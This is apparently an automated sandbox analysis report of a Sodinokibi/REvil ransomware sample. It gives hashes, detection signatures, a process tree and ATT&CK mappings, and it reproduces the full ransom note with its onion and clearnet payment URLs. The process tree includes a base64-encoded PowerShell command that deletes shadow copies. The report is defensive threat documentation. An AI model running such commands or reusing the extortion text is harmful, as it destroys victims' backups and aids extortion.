Analysis

  • max time kernel
    141s
  • max time network
    175s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 01:47

General

  • Target

    7882c0d6116d428fcd01064021e7d71abbf386466d50fda80efe9a98186fdb48.exe

  • Size

    165KB

  • MD5

    e2b5c416473037e099da9eb05c3be0c5

  • SHA1

    c6f5fc44799ecdafc2ad7d2e00065f852fcc304d

  • SHA256

    7882c0d6116d428fcd01064021e7d71abbf386466d50fda80efe9a98186fdb48

  • SHA512

    fb5d8f74d447e0d94a0118fb533863c7c3ab94fdbe97f0fa3d1c75eedc5f2e03cd800b6fe1d8764b9195c29beea5e604850d88e63dcc122f4cd87b479b483fc5

Score
10/10

Malware Config

Extracted

Path

C:\k1up96-help.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion k1up96. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/94762E324AAC8CF8 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/94762E324AAC8CF8 c) If you are having difficulty purchase bitcoins, or you doubt in buying decryptor, contact to any data recovery company in your country, they will give you more guarantees and take purchase and decryption procedure on themselves. Almost all such companies heared about us and know that our decryption program work, so they can help you. Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: dAHOYnkOZppr6fjj5RQizg4HkRv3u7wq++2zEiVaDqweEE2NWkgpRPuGxv+ujFQ0 ZQbU0x3SCf/7I3NlXNEbTfOzWJyrmcVBuQnzuy5b+/dY1CRBdOA+9wV0sqn/CQxB hkVLSLlPpiGNdwZ8zM/TI0raCNbeh+50EBwUXn8CgiDQbtaeeSn4pIKT9c7Xyjl2 DpFUUJXrQMKvKKRl+AOuaHmm825JLnpO0bxfz4JECSqiTyEv4GT2rUjU/ZWGDfYf UBfGuFO7c38JUFI2hBwiaXfQliZ+HNbBa8YMYHdZmav8xxHXcFlXV0TuODgP70OH BKmwqSCIU+DX2uIoTh23WKw1jL3eIkBipZsCHrP670fRGgqXYiZr8h21sxnSVCMo iImfkr402JEJCG+PeTGsSYuqX2TPeyrsurLztwhP5DO637BVl8ApubWfNhIPSVbP Gok8niIxYPM2s7T3Agj522UR/FlbHJkWUepa/muPDwShJCFeP6khinMztvbWkVjM gQN0wZGgp7mWzXkVvOf6a4JXPivucPCAjM9+VANkP1/PvoOfWdJxAwlQ7sDadwMZ aTLyd59a5tl3Eu5rzrabs+2C8xKdpgP2MDwm8vjsA9aUsqfvAwv2lGxzNXSuK9XQ JYXaPvlSMBIADWXJZg9dzDrIBMq6Ufx2P7aEsZcvmtx8YJJTvd8bvdDWrkhCp87F K/e6vHj8k9nme02zCKHUwOHaPrmGPHnKXRr+sssDOP6G77uCw7Y2mOS+W4XHCqA1 G9l2C2SsD3kTF614/tCw7yc2tZa2UrIF6DJqzhMvt59G9zZjMN8VNoksLtqSuu94 0dGc7ERqfUVoCJYBn4vnRDJcn2Fvev3Dx7Q3H6f52cfhvocQK39LKbwQD0kle7ab IUjBJXl4A5hjIxSPaVeKsil1Yc0zOvD1WTLPEss8RFRvh+R8eRJoZHzLVHdNatcL 9AE0ZnfSOZ23mRNFx3JC7Q04Kl00Q3P+WdIblJ1/GAkmerIaQr6HBeuF774/YM2m 35hCSXUn87OJs8OW/TUTJMTMchAIs2bfYoBDR9YuuNeyC7ustNMTqW6nd4X46/IM AARfWzssseoLpiKuZtXNIppNmOCxxYRXsv1SmBdcFKiwDJj4A5J+py0HD1vcWewT yc0= Extension name: k1up96 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/94762E324AAC8CF8

http://decryptor.top/94762E324AAC8CF8

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 11 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7882c0d6116d428fcd01064021e7d71abbf386466d50fda80efe9a98186fdb48.exe
    "C:\Users\Admin\AppData\Local\Temp\7882c0d6116d428fcd01064021e7d71abbf386466d50fda80efe9a98186fdb48.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Drops file in System32 directory
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:1384
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:560
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:280
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1060

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    2
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/560-55-0x000007FEFB611000-0x000007FEFB613000-memory.dmp
      Filesize

      8KB

    • memory/560-56-0x000007FEF26E0000-0x000007FEF323D000-memory.dmp
      Filesize

      11.4MB

    • memory/560-58-0x0000000002512000-0x0000000002514000-memory.dmp
      Filesize

      8KB

    • memory/560-57-0x0000000002510000-0x0000000002512000-memory.dmp
      Filesize

      8KB

    • memory/560-59-0x0000000002514000-0x0000000002517000-memory.dmp
      Filesize

      12KB

    • memory/560-60-0x000000001B700000-0x000000001B9FF000-memory.dmp
      Filesize

      3.0MB

    • memory/560-61-0x000000000251B000-0x000000000253A000-memory.dmp
      Filesize

      124KB

    • memory/1384-54-0x0000000075471000-0x0000000075473000-memory.dmp
      Filesize

      8KB